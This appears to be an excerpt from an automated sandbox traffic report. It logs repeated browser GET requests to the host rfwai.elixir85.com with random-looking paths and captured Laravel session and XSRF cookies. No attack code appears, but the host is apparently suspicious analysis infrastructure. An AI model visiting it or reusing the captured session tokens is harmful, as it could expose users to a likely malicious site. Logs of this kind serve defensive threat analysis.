Source: global traffic HTTP traffic detected: GET /ophQfOAKqa13061H23eI96MwQ1iF0kZmnaRI3dvE34mhKSmU3i9C67140 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /kliHDnAE0gTkmBMJlvBgKdx2UgHYVMjMpYKl2bzij6kYptmsP7Qz5ArvdibzdrlKBVuv220 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /ijBHzsqcIkRtTjbxMugPeR81zw0x5yUVlfNjXopYiBinvvsl7gMzOUKramHNI6Cfhnab228 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /mnn8U5yVMoEYzlOfgNnAivXZ1CIQzlLocVuvEshLSY4IQMWWAxbx90145 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /ijg96tfwHavl6dODlGNgwxFtzlAssOTwlMZqK1Qg56170 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /yoCRQfrZ0iVvPSQxT7vvEGN44mzSHgJf035E0VZBImhSjl HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /yzRdfjjshRC3IrYk8A7PQOd9IO3rsWR2oi1eXvnzkPxuZab180 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /rs3DhQgZj5jQkQBct28ombhTCAHmieGU0ouxgh9zt47ITiP0AvmihR1tBef200 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /ijW6ax7zUB7JKxnxsqoYba3bEJXUHkaugjRSkLLb83klpSwyDyWXfGqe6G7wTrPhUrnsIYwrzp12209 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /uvxQtGj3CZl2NHEVqVIl3gDjBSop26aE86MZBefBLzm512128 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /op8n0GHVANMlpH3sUTok8VHPTN8s9ObpAxHGstCocx0HifJbSyvtSDKzk5ywfdcd232 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /ophQfOAKqa13061H23eI96MwQ1iF0kZmnaRI3dvE34mhKSmU3i9C67140 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /mnn8U5yVMoEYzlOfgNnAivXZ1CIQzlLocVuvEshLSY4IQMWWAxbx90145 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /uvrkTtrGLzA9nOtO0uRNX2ukFXM6ttnWjIo6De4Rue8U5rkmnqqgYjP3dvGgTUnVi3jY1Cegh254 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
